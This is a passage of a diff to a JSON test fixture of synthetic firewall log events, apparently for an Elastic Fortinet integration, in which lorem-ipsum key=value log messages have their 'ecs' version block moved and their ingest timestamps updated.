"2021-12-14T14:43:11.779426978Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ptate date=2018-12-7 time=4:17:40 log_id=tenatu devid=emo devname=ratio logid=maperia type=Maloru subtype=sumquia level=low vd=imadmini srcip=10.237.5.219 srcport=3828 srcintf=eth4604 dstip=10.197.99.150 dstport=3877 dstintf=enp0s7388 poluuid=odo sessionid=itseddoe proto=prm action=accept policyid=itinvo trandisp=uiavol duration=96.864000 sentbyte=2685 rcvdbyte=7612 devtype=urmagn osname=ficiade osversion=1.2691 mastersrcmac=equ srcmac=01:00:5e:f5:2a:24 crscore=163.671000 craction=mipsum crlevel=dolor eventtype=cupidata user=niamquis service=lapariat hostname=dicta7226.mail.example profile=eddoei reqtype=cingel url=https://api.example.com/temporai/umw.jpg?mveniamq=litsed#ptasn direction=unknown msg=loinv method=umd cat=madmi catdesc=xercit device_id=avolup log_id=etdo pri=medium userfrom=veleum adminprof=emUten timezone=CT main_type=proiden trigger_policy=cita sub_type=iac severity_level=ntincul policy=mnisiste src=10.4.244.115 src_port=4588 dst=10.53.50.77 dst_port=5330 http_method=lorem http_url=lore http_host=orroqu http_agent=tlabo http_session_id=iameaque signature_subclass=sautemve signature_id=6466 srccountry=emoe content_switch_name=ameiusmo server_pool_name=ntiumtot false_positive_mitigation=aeab user_name=idolo monitor_status=temac http_refer=https://api.example.net/ollita/idolore.html?illu=iut#asiarc http_version=imidest dev_id=mwri threat_weight=orsi history_threat_weight=ritinvol threat_level=rporiss ftp_mode=atu ftp_cmd=ddo cipher_suite=veli msg_id=ata", "event": { - "ingested": "2021-12-09T13:37:31.907225300Z" + "ingested": "2021-12-14T14:43:11.779427617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=lor dtime=2018-12-21 23:20:14.972538723 +0000 UTC devid=ori devname=eleumiu vd=amre date=2018-12-21 time=11:20:14 logid=atur type=untex subtype=Except level=very-high eventtime=econse logtime=iac srcip=10.221.100.157 srcport=865 srcintf=lo4518 srcintfrole=mqu dstip=10.236.211.111 dstport=1801 dstintf=enp0s454 dstintfrole=rauto poluuid=pteursi sessionid=iquamqua proto=tcp action=allow policyid=psumqui policytype=equeporr crscore=32.741000 craction=cusanti crlevel=doloreme appcat=nsecte service=reprehen srccountry=taspe dstcountry=litess trandisp=enimadm tranip=10.120.212.78 tranport=119 duration=17.257000 sentbyte=4752 rcvdbyte=3484 sentpkt=ntsuntin app=ectetur", "event": { - "ingested": "2021-12-09T13:37:31.907229200Z" + "ingested": "2021-12-14T14:43:11.779428487Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-1-5 time=6:22:49 logver=intocca devid=vel devname=xeacom logid=orum type=voluptat subtype=nsequ level=medium vd=tenimad srcip=10.140.215.210 srcport=7229 srcintf=lo568 dstip=10.71.213.217 dstport=7475 dstintf=eth5820 poluuid=lup sessionid=reetdolo proto=HOPOPT action=accept policyid=dolor trandisp=emagnam duration=154.150000 sentbyte=2336 rcvdbyte=5326 devtype=emull osname=enatuser osversion=1.3052 mastersrcmac=ectob srcmac=01:00:5e:4a:5d:af crscore=9.013000 craction=niamqu crlevel=nrep eventtype=lauda user=ionevo service=busB hostname=pidatatn2627.www.localdomain profile=eritinvo reqtype=quiav url=https://mail.example.org/ngelit/dipiscin.gif?serro=ctet#umiurere direction=inbound msg=ciun method=ssitaspe cat=deomnis catdesc=ulamcol device_id=onn log_id=redol pri=medium userfrom=utlabore adminprof=nci timezone=OMST main_type=liqu trigger_policy=ectetura sub_type=aUte severity_level=untNeque policy=roi src=10.210.82.202 src_port=2749 dst=10.208.231.15 dst_port=412 http_method=rios http_url=diconseq http_host=tenima http_agent=iusm http_session_id=mveleumi signature_subclass=equinesc signature_id=5076 srccountry=mfugiatq content_switch_name=dmini server_pool_name=emveleu false_positive_mitigation=loree user_name=riatur monitor_status=tempor http_refer=https://internal.example.com/spiciati/tise.gif?ctas=rvelillu#qua http_version=ciat dev_id=iamq threat_weight=porin history_threat_weight=yCi threat_level=arc ftp_mode=santium ftp_cmd=numquame cipher_suite=umfugi msg_id=amestqui", "event": { - "ingested": "2021-12-09T13:37:31.907232800Z" + "ingested": "2021-12-14T14:43:11.779429093Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tesseq devname=\"nimides\" devid=\"iusmodte\" vd=involup date=2019-1-19 time=1:25:23 logid=edd type=dolorsi subtype=mcolabo level=low eventtime=exe logtime=nve srcip=10.226.255.3 srcport=5449 srcintf=lo7680 srcintfrole=iaconseq dstip=10.123.59.69 dstport=5399 dstintf=lo5835 dstintfrole=ntsunti poluuid=bor sessionid=uisnos proto=6 action=accept policyid=tation policytype=seddoe crscore=21.625000 craction=eur crlevel=ntmolli appcat=pitl service=nulap srccountry=ipexe dstcountry=aqueipsa trandisp=psum tranip=10.53.251.202 tranport=7501 duration=131.751000 sentbyte=6876 rcvdbyte=220 sentpkt=ugi app=ptate", "event": { - "ingested": "2021-12-09T13:37:31.907237300Z" + "ingested": "2021-12-14T14:43:11.779429611Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=rur devname=\"edut\" devid=\"sitametc\" vd=iarchite date=2019-2-2 time=8:27:57 logid=uide type=iono subtype=aboris level=very-high eventtime=imidest logtime=ulamc srcip=10.3.85.176 srcport=318 srcintf=eth2546 srcintfrole=uptateve dstip=10.212.56.26 dstport=3032 dstintf=enp0s2353 dstintfrole=loin poluuid=cinge sessionid=tutl proto=udp action=block policyid=nesciu policytype=ueip crscore=162.484000 craction=orumSe crlevel=mSe appcat=itame service=quaturv srccountry=lumdolor dstcountry=persp trandisp=leumi tranip=10.29.141.252 tranport=2077 duration=106.468000 sentbyte=3472 rcvdbyte=7868 sentpkt=orum app=reseos", "event": { - "ingested": "2021-12-09T13:37:31.907243600Z" + "ingested": "2021-12-14T14:43:11.779430117Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-2-17 time=3:30:32 devname=orem device_id=seq log_id=cus type=generic subtype=tnulap pri=very-high devid=psamvolu devname=inculp logid=eni type=tcupid subtype=ercita level=very-high vd=olorinr srcip=10.110.166.81 srcport=7354 srcintf=lo3023 dstip=10.181.48.82 dstport=1225 dstintf=eth7640 poluuid=conseq sessionid=Nemoen proto=6 action=cancel policyid=umquamei trandisp=nih duration=55.527000 sentbyte=3449 rcvdbyte=4658 devtype=quia osname=eabill osversion=1.95 mastersrcmac=oeiusmo srcmac=01:00:5e:82:ca:1b crscore=67.321000 craction=rumwrit crlevel=tionofd eventtype=ill user=orroquis service=laparia hostname=emveleu4029.api.local profile=tconse reqtype=ntsun url=https://internal.example.net/inc/riaturEx.htm?mnihilm=itinvo#lestia direction=external msg=metcons method=lumd cat=liquaUt catdesc=snos device_id=maccusan log_id=oeni pri=medium userfrom=tiaecon adminprof=tincu timezone=GMT-07:00 main_type=untmoll trigger_policy=par sub_type=idatatno severity_level=tfugit policy=tla src=10.126.11.186 src_port=589 dst=10.236.175.163 dst_port=6562 http_method=atemqui http_url=icaboN http_host=Utenimad http_agent=res http_session_id=officiad signature_subclass=nsectet signature_id=3977 srccountry=temU content_switch_name=ciduntut server_pool_name=ionofd false_positive_mitigation=etqua user_name=udantiu monitor_status=tium http_refer=https://internal.example.net/leumiu/iuta.html?tfugit=rorsitv#tiaecons http_version=uamestq dev_id=aliquaUt threat_weight=boreet history_threat_weight=mquam threat_level=volu ftp_mode=nof ftp_cmd=boNe cipher_suite=ovolu msg_id=cid", "event": { - "ingested": "2021-12-09T13:37:31.907248900Z" + "ingested": "2021-12-14T14:43:11.779430731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=equamn devname=\"mes\" devid=\"itatio\" vd=ssecillu date=2019-3-3 time=10:33:06 logid=oeius type=itin subtype=nostrud level=medium eventtime=byCic logtime=mnisiuta srcip=10.171.60.173 srcport=209 srcintf=lo1917 srcintfrole=usmodite dstip=10.11.150.136 dstport=3615 dstintf=lo5438 dstintfrole=olup poluuid=urQuis sessionid=iquip proto=1 action=cancel policyid=untutl policytype=elite crscore=176.898000 craction=ipsaq crlevel=spici appcat=nvolupt service=antiu srccountry=llumquid dstcountry=paq trandisp=olup tranip=10.83.98.220 tranport=1300 duration=73.115000 sentbyte=5812 rcvdbyte=3339 sentpkt=amquis app=umtotam", "event": { - "ingested": "2021-12-09T13:37:31.907270400Z" + "ingested": "2021-12-14T14:43:11.779431315Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=pitlabo dtime=2019-03-17 17:35:40.532538723 +0000 UTC devid=lorsita devname=datatno vd=emac date=2019-3-17 time=5:35:40 logid=uiavo type=tdo subtype=ratvolup level=high eventtime=dolo logtime=quioffic srcip=10.238.49.73 srcport=1554 srcintf=enp0s11 srcintfrole=riatu dstip=10.74.88.209 dstport=740 dstintf=lo5287 dstintfrole=quep poluuid=tfugitse sessionid=oenimips proto=udp action=deny policyid=mdo policytype=map crscore=148.871000 craction=osqui crlevel=consequ appcat=catcupid service=velitess srccountry=sit dstcountry=ipisc trandisp=onsectet tranip=10.92.3.166 tranport=5777 duration=156.314000 sentbyte=715 rcvdbyte=3946 sentpkt=itvol app=dolo", "event": { - "ingested": "2021-12-09T13:37:31.907275800Z" + "ingested": "2021-12-14T14:43:11.779431876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=amquisno dtime=2019-04-01 00:38:14.792538723 +0000 UTC devid=uptasnul devname=ptate vd=deri date=2019-4-1 time=12:38:14 logid=periamea type=equatD subtype=quaturQu level=high eventtime=rpo logtime=inr srcip=10.119.248.36 srcport=2450 srcintf=enp0s1885 srcintfrole=ten dstip=10.187.107.47 dstport=288 dstintf=lo2445 dstintfrole=fugia poluuid=psa sessionid=iset proto=prm action=allow policyid=ecte policytype=ionemull crscore=84.399000 craction=sBo crlevel=nimides appcat=iurere service=edolorin srccountry=labor dstcountry=quelaud trandisp=ira tranip=10.84.200.121 tranport=3226 duration=128.212000 sentbyte=2150 rcvdbyte=4329 sentpkt=nos app=icta", "event": { - "ingested": "2021-12-09T13:37:31.907281300Z" + "ingested": "2021-12-14T14:43:11.779432520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=itseddo devname=\"tasu\" devid=\"mquae\" vd=CSedu date=2019-4-15 time=7:40:49 logid=atae type=aeconseq subtype=boNemo level=very-high eventtime=nemulla logtime=tmollit srcip=10.167.128.229 srcport=4052 srcintf=eth1833 srcintfrole=ciatisu dstip=10.135.213.17 dstport=6427 dstintf=eth6468 dstintfrole=ritat poluuid=dipi sessionid=asnulapa proto=prm action=block policyid=onsequa policytype=seddoe crscore=23.021000 craction=Bonorume crlevel=emeumfu appcat=tla service=uidexea srccountry=odtem dstcountry=nvolupt trandisp=stia tranip=10.30.239.222 tranport=1546 duration=10.721000 sentbyte=6561 rcvdbyte=1057 sentpkt=itectobe app=rroq", "event": { - "ingested": "2021-12-09T13:37:31.907286700Z" + "ingested": "2021-12-14T14:43:11.779433029Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-29 time=2:43:23 devname=uunt device_id=pic log_id=unt type=generic subtype=emUt pri=medium devid=pernatur devname=orem logid=enbyCice type=velil subtype=nsequat level=low vd=duntutl srcip=10.238.172.76 srcport=156 srcintf=lo1215 dstip=10.201.119.253 dstport=2230 dstintf=enp0s7218 poluuid=nimad sessionid=tionu proto=udp action=block policyid=emagna trandisp=quin duration=68.078000 sentbyte=2527 rcvdbyte=1150 devtype=consequ osname=min osversion=1.1028 mastersrcmac=edicta srcmac=01:00:5e:cd:6c:ed crscore=163.905000 craction=itinvolu crlevel=urerepre eventtype=iumdol user=serror service=uptass hostname=rspic5637.api.local profile=itatise reqtype=iut url=https://api.example.net/ita/esse.txt?amquis=iatquovo#rExce direction=inbound msg=uraut method=reetdol cat=umtotam catdesc=itaedi device_id=ant log_id=tiumt pri=very-high userfrom=ratvolup adminprof=iamqu timezone=CT main_type=quaturve trigger_policy=tsunti sub_type=ero severity_level=iusmodi policy=acomm src=10.169.133.219 src_port=92 dst=10.115.166.48 dst_port=7491 http_method=eleumiur http_url=ididun http_host=edi http_agent=gia http_session_id=uaturQui signature_subclass=emi signature_id=5446 srccountry=etM content_switch_name=eve server_pool_name=iru false_positive_mitigation=ipit user_name=emq monitor_status=elitsedq http_refer=https://www.example.net/onsequat/emagnaa.gif?itse=tco#nnumqua http_version=erit dev_id=lorsitam threat_weight=emagnama history_threat_weight=ute threat_level=Excep ftp_mode=utpersp ftp_cmd=rehe cipher_suite=tiumt msg_id=ulamc", "event": { - "ingested": "2021-12-09T13:37:31.907292100Z" + "ingested": "2021-12-14T14:43:11.779433523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=runt date=2019-5-13 time=9:45:57 log_id=emipsu devid=icaboNem devname=Except logid=fugits type=maliquam subtype=mav level=very-high vd=ecill srcip=10.36.122.89 srcport=5040 srcintf=lo3887 dstip=10.206.76.186 dstport=741 dstintf=eth2435 poluuid=atisund sessionid=enbyCic proto=1 action=block policyid=nrepre trandisp=uisautem duration=145.667000 sentbyte=4247 rcvdbyte=4374 devtype=tio osname=aconseq osversion=1.4195 mastersrcmac=enatuser srcmac=01:00:5e:1a:9c:4f crscore=124.786000 craction=rcitatio crlevel=olore eventtype=ntexp user=atio service=roquisqu hostname=rror3870.www5.local profile=volu reqtype=occ url=https://www5.example.net/culpa/isun.txt?cola=tura#rat direction=internal msg=sect method=ing cat=nis catdesc=aboreet device_id=ulapari log_id=isetqu pri=high userfrom=ons adminprof=Sedu timezone=CEST main_type=icaboNem trigger_policy=enderi sub_type=edqu severity_level=cita policy=uidolore src=10.146.255.40 src_port=3003 dst=10.226.39.82 dst_port=3950 http_method=oluptate http_url=orumwrit http_host=aconse http_agent=ites http_session_id=abori signature_subclass=dolor signature_id=3543 srccountry=amqu content_switch_name=uamest server_pool_name=ntoccaec false_positive_mitigation=ites user_name=caecatcu monitor_status=iof http_refer=https://api.example.com/uae/mdolo.txt?aute=itatise#utpers http_version=equunt dev_id=Nemo threat_weight=itse history_threat_weight=lillumq threat_level=idid ftp_mode=uis ftp_cmd=velits cipher_suite=mmodo msg_id=rporissu", "event": { - "ingested": "2021-12-09T13:37:31.907297600Z" + "ingested": "2021-12-14T14:43:11.779434226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=utemvel dtime=2019-05-28 04:48:31.832538723 +0000 UTC devid=exercita devname=emaperi vd=aspernat date=2019-5-28 time=4:48:31 logid=ddoei type=nihi subtype=umfu level=low eventtime=ehen logtime=olupt srcip=10.53.82.96 srcport=7088 srcintf=eth297 srcintfrole=nostru dstip=10.224.212.88 dstport=5404 dstintf=lo4266 dstintfrole=natuserr poluuid=ipi sessionid=eniamqui proto=icmp action=deny policyid=urvelill policytype=iadese crscore=174.116000 craction=isundeo crlevel=emq appcat=rehender service=uat srccountry=apa dstcountry=tani trandisp=per tranip=10.35.240.70 tranport=2587 duration=62.993000 sentbyte=7102 rcvdbyte=2380 sentpkt=ataevit app=chi", "event": { - "ingested": "2021-12-09T13:37:31.907303100Z" + "ingested": "2021-12-14T14:43:11.779434793Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=lorsita devname=\"oeius\" devid=\"trud\" vd=aco date=2019-6-11 time=11:51:06 logid=uei type=tsedqu subtype=agni level=very-high eventtime=rsint logtime=catc srcip=10.186.253.240 srcport=6982 srcintf=enp0s5429 srcintfrole=end dstip=10.233.128.7 dstport=2455 dstintf=eth5315 dstintfrole=onnumq poluuid=lupt sessionid=ugiatq proto=prm action=cancel policyid=utla policytype=iosamn crscore=164.209000 craction=tor crlevel=toreve appcat=ita service=orain srccountry=tnulap dstcountry=aevitae trandisp=aqu tranip=10.66.149.234 tranport=6236 duration=128.130000 sentbyte=6344 rcvdbyte=475 sentpkt=loremeu app=tate", "event": { - "ingested": "2021-12-09T13:37:31.907308500Z" + "ingested": "2021-12-14T14:43:11.779435455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=elaud dtime=2019-06-25 18:53:40.352538723 +0000 UTC devid=iad devname=irat vd=upi date=2019-6-25 time=6:53:40 logid=rsintocc type=itanim subtype=sinto level=medium eventtime=lore logtime=eabi srcip=10.227.133.134 srcport=3351 srcintf=enp0s4820 srcintfrole=erspici dstip=10.46.11.114 dstport=4009 dstintf=enp0s7159 dstintfrole=oremq poluuid=rspiciat sessionid=ptas proto=tcp action=cancel policyid=ore policytype=dut crscore=128.554000 craction=remape crlevel=itectob appcat=sedquia service=mquisnos srccountry=mwritt dstcountry=avolupt trandisp=lumdolo tranip=10.173.140.201 tranport=6422 duration=133.394000 sentbyte=7249 rcvdbyte=1387 sentpkt=str app=sit", "event": { - "ingested": "2021-12-09T13:37:31.907313900Z" + "ingested": "2021-12-14T14:43:11.779436049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=elillum dtime=2019-07-10 01:56:14.612538723 +0000 UTC devid=isnos devname=emp vd=eos date=2019-7-10 time=1:56:14 logid=sciveli type=Bonoru subtype=rai level=low eventtime=omm logtime=cepteu srcip=10.205.18.11 srcport=6737 srcintf=eth4759 srcintfrole=ueipsa dstip=10.69.130.207 dstport=1191 dstintf=eth614 dstintfrole=architec poluuid=era sessionid=ptatem proto=udp action=cancel policyid=isi policytype=ssecill crscore=44.181000 craction=exerci crlevel=ptatemUt appcat=temqu service=ofd srccountry=nimvenia dstcountry=ari trandisp=eir tranip=10.170.236.123 tranport=4346 duration=150.036000 sentbyte=6877 rcvdbyte=1751 sentpkt=orum app=tation", "event": { - "ingested": "2021-12-09T13:37:31.907319300Z" + "ingested": "2021-12-14T14:43:11.779436778Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=repre date=2019-7-24 time=8:58:48 log_id=ore devid=ionemu devname=rehend logid=uiad type=tasu subtype=sciun level=high vd=taev srcip=10.196.124.206 srcport=7569 srcintf=enp0s2181 dstip=10.186.88.110 dstport=4203 dstintf=enp0s5497 poluuid=asnulapa sessionid=hende proto=0 action=deny policyid=ntmolli trandisp=uto duration=178.755000 sentbyte=6361 rcvdbyte=1742 devtype=ipsu osname=taedi osversion=1.2682 mastersrcmac=acom srcmac=01:00:5e:99:e3:a5 crscore=175.099000 craction=Cic crlevel=aturveli eventtype=lica user=Exc service=amvolup hostname=velill3821.mail.invalid profile=asnulap reqtype=usmodte url=https://example.com/loremag/mqu.gif?bore=lapari#aborios direction=external msg=lorem method=mnisiuta cat=quiadolo catdesc=abo device_id=msequine log_id=mrem pri=medium userfrom=atuserr adminprof=nsequatu timezone=ET main_type=uptasnu trigger_policy=atemUt sub_type=iurere severity_level=oident policy=volup src=10.97.254.192 src_port=302 dst=10.124.34.251 dst_port=3899 http_method=imide http_url=sequa http_host=ine http_agent=ollitan http_session_id=eacomm signature_subclass=onseq signature_id=6250 srccountry=reetd content_switch_name=equamnih server_pool_name=tevelite false_positive_mitigation=sitvolup user_name=epor monitor_status=atatnonp http_refer=https://example.org/elauda/ria.htm?uptatemU=iono#quun http_version=itationu dev_id=eniamqui threat_weight=adolo history_threat_weight=oreetdol threat_level=uinesciu ftp_mode=sciun ftp_cmd=tametc cipher_suite=rExcep msg_id=avolup", "event": { - "ingested": "2021-12-09T13:37:31.907324700Z" + "ingested": "2021-12-14T14:43:11.779437276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=olores devname=\"ineavol\" devid=\"bori\" vd=taev date=2019-8-7 time=4:01:23 logid=ngelit type=uidexea subtype=stiaec level=very-high eventtime=quipex logtime=rsintoc srcip=10.9.41.221 srcport=4010 srcintf=eth434 srcintfrole=estlabor dstip=10.81.58.91 dstport=2247 dstintf=lo6072 dstintfrole=udexerci poluuid=onemul sessionid=elaud proto=tcp action=cancel policyid=trudexe policytype=tiumtota crscore=53.861000 craction=ariaturE crlevel=fug appcat=umqu service=umqu srccountry=roide dstcountry=tio trandisp=autem tranip=10.204.98.238 tranport=3885 duration=108.380000 sentbyte=2498 rcvdbyte=3936 sentpkt=aquioffi app=aliqui", "event": { - "ingested": "2021-12-09T13:37:31.907329700Z" + "ingested": "2021-12-14T14:43:11.779437744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-8-21 time=11:03:57 devname=unti device_id=tena log_id=velits type=event subtype=oditautf pri=high desc=rmagni user=tiono userfrom=utemvele msg=taevi action=cancel adom=xplicabo4308.www.example session_id=tquo", "event": { - "ingested": "2021-12-09T13:37:31.907333Z" + "ingested": "2021-12-14T14:43:11.779438251Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=nrepr devname=\"uipex\" devid=\"alorumw\" vd=nibus date=2019-9-5 time=6:06:31 logid=eiusmo type=rci subtype=seosquir level=medium eventtime=ume logtime=ercitati srcip=10.35.84.125 srcport=341 srcintf=enp0s2388 srcintfrole=pernatu dstip=10.37.120.29 dstport=4170 dstintf=enp0s1127 dstintfrole=tasuntex poluuid=etura sessionid=taedi proto=udp action=accept policyid=quiacon policytype=udexerc crscore=66.169000 craction=undeomni crlevel=ritquiin appcat=taspern service=iadeser srccountry=nos dstcountry=mollita trandisp=eserun tranip=10.212.208.70 tranport=3237 duration=36.569000 sentbyte=5330 rcvdbyte=11 sentpkt=otamr app=eveli", "event": { - "ingested": "2021-12-09T13:37:31.907337300Z" + "ingested": "2021-12-14T14:43:11.779438783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=temsequi devname=\"aturvel\" devid=\"elaudan\" vd=alorum date=2019-9-19 time=1:09:05 logid=olor type=inesc subtype=tlaborio level=high eventtime=equeporr logtime=seq srcip=10.143.65.84 srcport=2670 srcintf=enp0s5828 srcintfrole=ddoeiu dstip=10.199.201.26 dstport=3770 dstintf=eth4236 dstintfrole=ore poluuid=onse sessionid=abo proto=1 action=accept policyid=magnaa policytype=tateveli crscore=94.258000 craction=xplica crlevel=dex appcat=rsintocc service=iusmo srccountry=oquisqu dstcountry=ullamcor trandisp=remagn tranip=10.207.207.106 tranport=2048 duration=94.877000 sentbyte=6896 rcvdbyte=7419 sentpkt=tvolup app=ites", "event": { - "ingested": "2021-12-09T13:37:31.907342100Z" + "ingested": "2021-12-14T14:43:11.779439338Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=rExce dtime=2019-10-03 20:11:40.172538723 +0000 UTC devid=rittenby devname=gni vd=ritq date=2019-10-3 time=8:11:40 logid=lestiaec type=rissusci subtype=fdeFi level=high eventtime=ehende logtime=riatu srcip=10.204.27.48 srcport=5998 srcintf=lo7358 srcintfrole=emaperia dstip=10.163.236.253 dstport=7768 dstintf=enp0s2100 dstintfrole=sequatu poluuid=ugi sessionid=oditau proto=1 action=block policyid=mvele policytype=atae crscore=123.668000 craction=imips crlevel=admi appcat=ocons service=tiumdol srccountry=sunt dstcountry=rrorsi trandisp=remagna tranip=10.41.61.88 tranport=426 duration=82.943000 sentbyte=525 rcvdbyte=3702 sentpkt=dolor app=ips", "event": { - "ingested": "2021-12-09T13:37:31.907346800Z" + "ingested": "2021-12-14T14:43:11.779439899Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ipitlab dtime=2019-10-18 03:14:14.432538723 +0000 UTC devid=ipsa devname=dents vd=erepreh date=2019-10-18 time=3:14:14 logid=amest type=dolore subtype=xer level=medium eventtime=onemul logtime=off srcip=10.246.81.164 srcport=3453 srcintf=lo3071 srcintfrole=ende dstip=10.185.44.26 dstport=3193 dstintf=lo7861 dstintfrole=tationul poluuid=tam sessionid=byCic proto=0 action=cancel policyid=cons policytype=serro crscore=5.473000 craction=uiac crlevel=aecatcu appcat=sed service=uisnostr srccountry=aquei dstcountry=ation trandisp=sumqu tranip=10.53.110.111 tranport=2549 duration=141.141000 sentbyte=5569 rcvdbyte=5239 sentpkt=entore app=uaturQ", "event": { - "ingested": "2021-12-09T13:37:31.907351Z" + "ingested": "2021-12-14T14:43:11.779440545Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=xpli date=2019-11-1 time=10:16:48 log_id=quae devid=totamre devname=lam logid=quamestq type=porai subtype=oinve level=medium vd=hender srcip=10.84.154.230 srcport=1335 srcintf=enp0s1127 dstip=10.212.63.179 dstport=6790 dstintf=eth1762 poluuid=eufugia sessionid=temqu proto=3 action=allow policyid=tvolup trandisp=lori duration=130.339000 sentbyte=4763 rcvdbyte=4334 devtype=rnatur osname=etdolo osversion=1.802 mastersrcmac=adipisci srcmac=01:00:5e:7b:68:0e crscore=36.122000 craction=culpaq crlevel=quis eventtype=lupt user=upt service=aboN hostname=cupida6106.www5.local profile=tdo reqtype=asperna url=https://api.example.com/aco/empo.jpg?iumdol=iusm#ido direction=unknown msg=peri method=aspernat cat=seq catdesc=olup device_id=uamqu log_id=veli pri=high userfrom=etco adminprof=nulap timezone=CT main_type=radip trigger_policy=tali sub_type=ntin severity_level=loreseos policy=ites src=10.109.172.90 src_port=2785 dst=10.146.77.206 dst_port=1554 http_method=amnihilm http_url=ipsamv http_host=proid http_agent=xcep http_session_id=udantium signature_subclass=sum signature_id=1723 srccountry=iaecon content_switch_name=euf server_pool_name=norume false_positive_mitigation=hilmo user_name=aquaeab monitor_status=eporr http_refer=https://www.example.com/metMalo/santiu.jpg?icon=enderit#roquisqu http_version=lapa dev_id=imadm threat_weight=giatquo history_threat_weight=oeiusm threat_level=oreeuf ftp_mode=iusmodt ftp_cmd=umwrit cipher_suite=atatn msg_id=uatD", "event": { - "ingested": "2021-12-09T13:37:31.907354700Z" + "ingested": "2021-12-14T14:43:11.779441174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-15 time=5:19:22 devname=ptate device_id=Nemoe log_id=cupidat type=generic subtype=onsequ pri=high devid=nostr devname=umtotam logid=mqua type=emU subtype=gnido level=very-high vd=plicab srcip=10.8.161.226 srcport=3191 srcintf=eth5256 dstip=10.13.234.237 dstport=3760 dstintf=enp0s1149 poluuid=oeiusmo sessionid=nisi proto=6 action=allow policyid=lupt trandisp=tlaborio duration=18.804000 sentbyte=1061 rcvdbyte=6464 devtype=itan osname=iquidexe osversion=1.2314 mastersrcmac=fugia srcmac=01:00:5e:09:8f:0e crscore=5.320000 craction=onof crlevel=quam eventtype=rure user=ipis service=liqu hostname=unt2122.internal.local profile=orsitame reqtype=tassitas url=https://example.org/uidolor/turve.htm?temporai=uasiarch#ect direction=unknown msg=occae method=lpaqu cat=minimav catdesc=col device_id=riamea log_id=ern pri=low userfrom=odtempo adminprof=con timezone=CEST main_type=offici trigger_policy=uipexe sub_type=ium severity_level=quamqua policy=nsequatu src=10.38.18.72 src_port=3177 dst=10.202.250.141 dst_port=1824 http_method=volu http_url=quatDui http_host=stenat http_agent=liquip http_session_id=eiusmodt signature_subclass=dmi signature_id=4174 srccountry=ameaque content_switch_name=pitlabor server_pool_name=essequa false_positive_mitigation=ini user_name=maperia monitor_status=ovolup http_refer=https://mail.example.com/veniamq/uisno.htm?luptas=omm#eaquei http_version=iveli dev_id=lill threat_weight=voluptat history_threat_weight=aturveli threat_level=incidunt ftp_mode=tatnonp ftp_cmd=abi cipher_suite=nimave msg_id=atu", "event": { - "ingested": "2021-12-09T13:37:31.907358500Z" + "ingested": "2021-12-14T14:43:11.779441870Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=siu date=2019-11-30 time=12:21:57 log_id=inrepr devid=cero devname=ita logid=xercitat type=meumfug subtype=umt level=very-high vd=laparia srcip=10.195.87.127 srcport=760 srcintf=lo3094 dstip=10.52.118.202 dstport=6556 dstintf=enp0s5751 poluuid=ectobe sessionid=rehender proto=udp action=block policyid=orinc trandisp=tcons duration=52.473000 sentbyte=7043 rcvdbyte=4714 devtype=suscipi osname=imipsam 